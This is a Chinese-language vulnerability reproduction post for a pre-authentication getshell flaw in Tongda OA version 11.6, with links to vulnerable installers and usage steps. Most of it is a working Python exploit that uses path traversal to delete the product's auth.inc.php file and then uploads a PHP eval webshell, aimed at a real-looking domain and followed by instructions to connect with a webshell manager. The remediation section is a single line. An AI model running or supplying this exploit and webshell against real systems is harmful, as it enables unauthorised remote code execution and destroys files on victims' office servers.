最新通达OA11.6版本前台getshell漏洞复现
0x00漏洞简介
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。
该exp会删除uth.inc.php文件可能回损害oa系统。
0X01漏洞影响版本
经测试,11.6版本受影响,11.3以及2017版本不受影响
0X02漏洞环境搭建
链接:https://pan.baidu.com/s/1VqUUNUsgsssK1Mhq2r8HHQ
提取码:him4
安装包为11.6版本
链接:https://pan.baidu.com/s/1P81Fw0m0_FOWYALjqNcRFw
提取码:nw94
安装包为11.3版本
链接:https://pan.baidu.com/s/164qP3pnbE6gQ29fkTXI52g
提取码:ab4b
安装包为2017版本
下载好后傻瓜式安装即可
0X03漏洞复现
将exp中的target替换为目标url
Payload替换为自己的木马即可
然后使用webshell管理工具即可
结果图为:
第一个为11.6利用成功
第二个为11.3利用失败
第三个为2017利用失败
菜刀连接
0X04exp
Exp代码为:
import requests target="http://oa.ldxyhq.com/" payload="<?php eval($_REQUEST['a']);?>" print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA") input("Press enter to continue") print("[*]Deleting auth.inc.php....") url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php" requests.get(url=url) print("[*]Checking if file deleted...") url=target+"/inc/auth.inc.php" page=requests.get(url=url).text if 'No input file specified.' not in page: print("[-]Failed to deleted auth.inc.php") exit(-1) print("[+]Successfully deleted auth.inc.php!") print("[*]Uploading payload...") url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./" files = {'FILE1': ('hack.php', payload)} requests.post(url=url,files=files) url=target+"/_hack.php" page=requests.get(url=url).text if 'No input file specified.' not in page: print("[+]Filed Uploaded Successfully") print("[+]URL:",url) else: print("[-]Failed to upload file")
0X05漏洞修复
升级官方最新版本